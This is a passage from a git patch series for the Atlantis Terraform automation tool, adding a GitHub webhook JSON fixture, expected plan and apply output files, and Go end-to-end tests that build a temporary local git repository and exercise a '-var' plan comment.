+      "label": "runatlantis:noyaml",
+      "ref": "noyaml",
+      "sha": "c31fd9ea6f557ad2ea659944c3844a059b83bc5d",
+      "user": {
+        "login": "runatlantis",
+        "id": 1034429,
+        "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+        "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+        "gravatar_id": "",
+        "url": "https://api.github.com/users/runatlantis",
+        "html_url": "https://github.com/runatlantis",
+        "followers_url": "https://api.github.com/users/runatlantis/followers",
+        "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+        "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+        "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+        "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+        "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+        "repos_url": "https://api.github.com/users/runatlantis/repos",
+        "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+        "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+        "type": "User",
+        "site_admin": false
+      },
+      "repo": {
+        "id": 136474117,
+        "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+        "name": "atlantis-tests",
+        "full_name": "runatlantis/atlantis-tests",
+        "owner": {
+          "login": "runatlantis",
+          "id": 1034429,
+          "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+          "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+          "gravatar_id": "",
+          "url": "https://api.github.com/users/runatlantis",
+          "html_url": "https://github.com/runatlantis",
+          "followers_url": "https://api.github.com/users/runatlantis/followers",
+          "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+          "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+          "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+          "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+          "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+          "repos_url": "https://api.github.com/users/runatlantis/repos",
+          "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+          "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+          "type": "User",
+          "site_admin": false
+        },
+        "private": false,
+        "html_url": "https://github.com/runatlantis/atlantis-tests",
+        "description": "A set of terraform projects that atlantis e2e tests run on.",
+        "fork": true,
+        "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+        "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+        "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+        "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+        "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+        "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+        "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+        "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+        "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+        "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+        "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+        "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+        "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+        "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+        "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+        "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+        "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+        "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+        "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+        "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+        "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+        "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+        "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+        "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+        "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+        "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+        "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+        "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+        "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+        "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+        "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+        "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+        "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+        "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+        "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+        "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+        "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+        "created_at": "2018-06-07T12:28:23Z",
+        "updated_at": "2018-06-07T12:28:27Z",
+        "pushed_at": "2018-06-11T16:22:09Z",
+        "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+        "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+        "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+        "svn_url": "https://github.com/runatlantis/atlantis-tests",
+        "homepage": null,
+        "size": 7,
+        "stargazers_count": 0,
+        "watchers_count": 0,
+        "language": "HCL",
+        "has_issues": false,
+        "has_projects": true,
+        "has_downloads": true,
+        "has_wiki": false,
+        "has_pages": false,
+        "forks_count": 0,
+        "mirror_url": null,
+        "archived": false,
+        "open_issues_count": 2,
+        "license": {
+          "key": "other",
+          "name": "Other",
+          "spdx_id": null,
+          "url": null,
+          "node_id": "MDc6TGljZW5zZTA="
+        },
+        "forks": 0,
+        "open_issues": 2,
+        "watchers": 0,
+        "default_branch": "master"
+      }
+    },
+    "base": {
+      "label": "runatlantis:master",
+      "ref": "master",
+      "sha": "f59a822e83b3cd193142c7624ea635a5d7894388",
+      "user": {
+        "login": "runatlantis",
+        "id": 1034429,
+        "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+        "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+        "gravatar_id": "",
+        "url": "https://api.github.com/users/runatlantis",
+        "html_url": "https://github.com/runatlantis",
+        "followers_url": "https://api.github.com/users/runatlantis/followers",
+        "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+        "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+        "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+        "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+        "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+        "repos_url": "https://api.github.com/users/runatlantis/repos",
+        "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+        "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+        "type": "User",
+        "site_admin": false
+      },
+      "repo": {
+        "id": 136474117,
+        "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+        "name": "atlantis-tests",
+        "full_name": "runatlantis/atlantis-tests",
+        "owner": {
+          "login": "runatlantis",
+          "id": 1034429,
+          "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+          "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+          "gravatar_id": "",
+          "url": "https://api.github.com/users/runatlantis",
+          "html_url": "https://github.com/runatlantis",
+          "followers_url": "https://api.github.com/users/runatlantis/followers",
+          "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+          "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+          "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+          "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+          "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+          "repos_url": "https://api.github.com/users/runatlantis/repos",
+          "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+          "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+          "type": "User",
+          "site_admin": false
+        },
+        "private": false,
+        "html_url": "https://github.com/runatlantis/atlantis-tests",
+        "description": "A set of terraform projects that atlantis e2e tests run on.",
+        "fork": true,
+        "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+        "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+        "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+        "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+        "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+        "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+        "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+        "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+        "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+        "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+        "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+        "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+        "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+        "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+        "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+        "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+        "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+        "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+        "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+        "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+        "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+        "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+        "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+        "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+        "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+        "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+        "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+        "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+        "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+        "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+        "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+        "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+        "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+        "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+        "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+        "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+        "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+        "created_at": "2018-06-07T12:28:23Z",
+        "updated_at": "2018-06-07T12:28:27Z",
+        "pushed_at": "2018-06-11T16:22:09Z",
+        "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+        "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+        "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+        "svn_url": "https://github.com/runatlantis/atlantis-tests",
+        "homepage": null,
+        "size": 7,
+        "stargazers_count": 0,
+        "watchers_count": 0,
+        "language": "HCL",
+        "has_issues": false,
+        "has_projects": true,
+        "has_downloads": true,
+        "has_wiki": false,
+        "has_pages": false,
+        "forks_count": 0,
+        "mirror_url": null,
+        "archived": false,
+        "open_issues_count": 2,
+        "license": {
+          "key": "other",
+          "name": "Other",
+          "spdx_id": null,
+          "url": null,
+          "node_id": "MDc6TGljZW5zZTA="
+        },
+        "forks": 0,
+        "open_issues": 2,
+        "watchers": 0,
+        "default_branch": "master"
+      }
+    },
+    "_links": {
+      "self": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2"
+      },
+      "html": {
+        "href": "https://github.com/runatlantis/atlantis-tests/pull/2"
+      },
+      "issue": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2"
+      },
+      "comments": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments"
+      },
+      "review_comments": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments"
+      },
+      "review_comment": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}"
+      },
+      "commits": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits"
+      },
+      "statuses": {
+        "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d"
+      }
+    },
+    "author_association": "OWNER",
+    "merged": false,
+    "mergeable": null,
+    "rebaseable": null,
+    "mergeable_state": "unknown",
+    "merged_by": null,
+    "comments": 0,
+    "review_comments": 0,
+    "maintainer_can_modify": false,
+    "commits": 5,
+    "additions": 181,
+    "deletions": 8,
+    "changed_files": 23
+  },
+  "repository": {
+    "id": 136474117,
+    "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+    "name": "atlantis-tests",
+    "full_name": "runatlantis/atlantis-tests",
+    "owner": {
+      "login": "runatlantis",
+      "id": 1034429,
+      "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+      "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+      "gravatar_id": "",
+      "url": "https://api.github.com/users/runatlantis",
+      "html_url": "https://github.com/runatlantis",
+      "followers_url": "https://api.github.com/users/runatlantis/followers",
+      "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+      "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+      "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+      "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+      "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+      "repos_url": "https://api.github.com/users/runatlantis/repos",
+      "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+      "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+      "type": "User",
+      "site_admin": false
+    },
+    "private": false,
+    "html_url": "https://github.com/runatlantis/atlantis-tests",
+    "description": "A set of terraform projects that atlantis e2e tests run on.",
+    "fork": true,
+    "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+    "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+    "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+    "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+    "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+    "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+    "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+    "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+    "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+    "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+    "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+    "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+    "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+    "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+    "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+    "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+    "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+    "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+    "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+    "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+    "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+    "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+    "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+    "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+    "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+    "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+    "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+    "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+    "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+    "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+    "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+    "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+    "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+    "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+    "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+    "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+    "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+    "created_at": "2018-06-07T12:28:23Z",
+    "updated_at": "2018-06-07T12:28:27Z",
+    "pushed_at": "2018-06-11T16:22:09Z",
+    "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+    "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+    "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+    "svn_url": "https://github.com/runatlantis/atlantis-tests",
+    "homepage": null,
+    "size": 7,
+    "stargazers_count": 0,
+    "watchers_count": 0,
+    "language": "HCL",
+    "has_issues": false,
+    "has_projects": true,
+    "has_downloads": true,
+    "has_wiki": false,
+    "has_pages": false,
+    "forks_count": 0,
+    "mirror_url": null,
+    "archived": false,
+    "open_issues_count": 2,
+    "license": {
+      "key": "other",
+      "name": "Other",
+      "spdx_id": null,
+      "url": null,
+      "node_id": "MDc6TGljZW5zZTA="
+    },
+    "forks": 0,
+    "open_issues": 2,
+    "watchers": 0,
+    "default_branch": "master"
+  },
+  "sender": {
+    "login": "runatlantis",
+    "id": 1034429,
+    "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+    "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+    "gravatar_id": "",
+    "url": "https://api.github.com/users/runatlantis",
+    "html_url": "https://github.com/runatlantis",
+    "followers_url": "https://api.github.com/users/runatlantis/followers",
+    "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+    "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+    "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+    "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+    "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+    "repos_url": "https://api.github.com/users/runatlantis/repos",
+    "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+    "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+    "type": "User",
+    "site_admin": false
+  }
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/.gitkeep b/server/testfixtures/test-repos/simple/.gitkeep
new file mode 100644
index 0000000000..e69de29bb2
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt
new file mode 100644
index 0000000000..4d254afae5
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `.` workspace: `default`
+```diff
+null_resource.simple: Creating...
+null_resource.simple: Creation complete after 0s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+this = default
+
+```
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-autoplan.txt b/server/testfixtures/test-repos/simple/exp-output-autoplan.txt
new file mode 100644
index 0000000000..15a712c428
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-autoplan.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `.` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+  + create
+
+Terraform will perform the following actions:
+
++ null_resource.simple
+      id: <computed>
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/simple/exp-output-merge.txt b/server/testfixtures/test-repos/simple/exp-output-merge.txt
new file mode 100644
index 0000000000..c09b916bd6
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-merge.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/.` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf
index 648c412e1f..028fbb2139 100644
--- a/server/testfixtures/test-repos/simple/main.tf
+++ b/server/testfixtures/test-repos/simple/main.tf
@@ -1,3 +1,11 @@
 resource "null_resource" "simple" {
   count = 1
+}
+
+variable "var" {
+  default = "default"
+}
+
+output "this" {
+  value = "${var.var}"
 }
\ No newline at end of file

From a162b36b94305c75877c56328335f36baeecca4e Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Sat, 16 Jun 2018 20:54:29 +0100
Subject: [PATCH 25/69] Remove need for .git in test fixtures.

---
 server/events_controller_e2e_test.go | 43 ++++++++++++++++++++++++----
 1 file changed, 38 insertions(+), 5 deletions(-)

diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 8a9bd66915..35795cb3e7 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -6,6 +6,7 @@ import (
 	"io/ioutil"
 	"net/http"
 	"net/http/httptest"
+	"os/exec"
 	"path/filepath"
 	"regexp"
 	"strings"
@@ -72,8 +73,8 @@ func TestGitHubWorkflow(t *testing.T) {
 		ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t)
 		t.Run(c.Description, func(t *testing.T) {
 			// Set the repo to be cloned through the testing backdoor.
-			repoDir, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", c.RepoDir))
-			Ok(t, err)
+			repoDir, cleanup := initializeRepo(t, c.RepoDir)
+			defer cleanup()
 			atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir)
 
 			// Setup test dependencies.
@@ -99,14 +100,14 @@ func TestGitHubWorkflow(t *testing.T) {
 				w = httptest.NewRecorder()
 				ctrl.Post(w, commentReq)
 				responseContains(t, w, 200, "Processing...")
-				_, _, autoplanComment = vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+				_, _, atlantisComment := vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
 
 				exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile))
 				Ok(t, err)
 				// Replace all 'ID: 1111818181' strings with * so we can do a comparison.
 				idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`)
-				autoplanComment = idRegex.ReplaceAllString(autoplanComment, "(ID: ******************)")
-				Equals(t, string(exp), autoplanComment)
+				atlantisComment = idRegex.ReplaceAllString(atlantisComment, "(ID: ******************)")
+				Equals(t, string(exp), atlantisComment)
 			}
 
 			// Finally, send the pull request merged event.
@@ -302,3 +303,35 @@ func GitHubPullRequestParsed() *github.PullRequest {
 		},
 	}
 }
+
+// initializeRepo copies the repo data from testfixtures and initializes a new
+// git repo in a temp directory. It returns that directory and a function
+// to run in a defer that will delete the dir.
+// The purpose of this function is to create a real git repository with a branch
+// called 'branch' from the files under repoDir. This is so we can check in
+// those files normally without needing a .git directory.
+func initializeRepo(t *testing.T, repoDir string) (string, func()) {
+	originRepo, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir))
+	Ok(t, err)
+
+	// Copy the files to the temp dir.
+	destDir, cleanup := TempDir(t)
+	runCmd(t, "", "cp", "-r", fmt.Sprintf("%s/.", originRepo), destDir)
+
+	// Initialize the git repo.
+	runCmd(t, destDir, "git", "init")
+	runCmd(t, destDir, "git", "add", ".gitkeep")
+	runCmd(t, destDir, "git", "commit", "-m", "initial commit")
+	runCmd(t, destDir, "git", "checkout", "-b", "branch")
+	runCmd(t, destDir, "git", "add", ".")
+	runCmd(t, destDir, "git", "commit", "-am", "branch commit")
+
+	return destDir, cleanup
+}
+
+func runCmd(t *testing.T, dir string, name string, args ...string) {
+	cpCmd := exec.Command(name, args...)
+	cpCmd.Dir = dir
+	cpOut, err := cpCmd.CombinedOutput()
+	Assert(t, err == nil, "err running %q: %s", strings.Join(append([]string{name}, args...), " "), cpOut)
+}

From de5c4061bdc4e019272fb249938353008ccfee8e Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Mon, 18 Jun 2018 10:28:58 +0100
Subject: [PATCH 26/69] Add -var test.

---
 server/events_controller_e2e_test.go          | 18 ++++++++++++---
 .../simple/exp-output-apply-var.txt           | 13 +++++++++++
 .../simple/exp-output-atlantis-plan-var.txt   | 23 +++++++++++++++++++
 3 files changed, 51 insertions(+), 3 deletions(-)
 create mode 100644 server/testfixtures/test-repos/simple/exp-output-apply-var.txt
 create mode 100644 server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var.txt

diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go
index 35795cb3e7..a791a89bda 100644
--- a/server/events_controller_e2e_test.go
+++ b/server/events_controller_e2e_test.go
@@ -68,10 +68,21 @@ func TestGitHubWorkflow(t *testing.T) {
 			},
 			ExpMergeCommentFile: "exp-output-merge.txt",
 		},
+		{
+			Description:            "simple with comment -var",
+			RepoDir:                "simple",
+			ModifiedFiles:          []string{"main.tf"},
+			ExpAutoplanCommentFile: "exp-output-autoplan.txt",
+			CommentAndReplies: []string{
+				"atlantis plan -- -var var=overridden", "exp-output-atlantis-plan-var.txt",
+				"atlantis apply", "exp-output-apply-var.txt",
+			},
+			ExpMergeCommentFile: "exp-output-merge.txt",
+		},
 	}
 	for _, c := range cases {
-		ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t)
 		t.Run(c.Description, func(t *testing.T) {
+			ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t)
 			// Set the repo to be cloned through the testing backdoor.
 			repoDir, cleanup := initializeRepo(t, c.RepoDir)
 			defer cleanup()
@@ -100,7 +111,7 @@ func TestGitHubWorkflow(t *testing.T) {
 				w = httptest.NewRecorder()
 				ctrl.Post(w, commentReq)
 				responseContains(t, w, 200, "Processing...")
-				_, _, atlantisComment := vcsClient.VerifyWasCalled(Twice()).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+				_, _, atlantisComment := vcsClient.VerifyWasCalled(Times((i/2)+2)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
 
 				exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile))
 				Ok(t, err)
@@ -115,7 +126,8 @@ func TestGitHubWorkflow(t *testing.T) {
 			w = httptest.NewRecorder()
 			ctrl.Post(w, pullClosedReq)
 			responseContains(t, w, 200, "Pull request cleaned successfully")
-			_, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(3)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+			numPrevComments := (len(c.CommentAndReplies) / 2) + 1
+			_, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(numPrevComments+1)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments()
 			exp, err = ioutil.ReadFile(filepath.Join(repoDir, c.ExpMergeCommentFile))
 			Ok(t, err)
 			Equals(t, string(exp), pullClosedComment)
diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
new file mode 100644
index 0000000000..3c58045de2
--- /dev/null
+++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `.` workspace: `default`
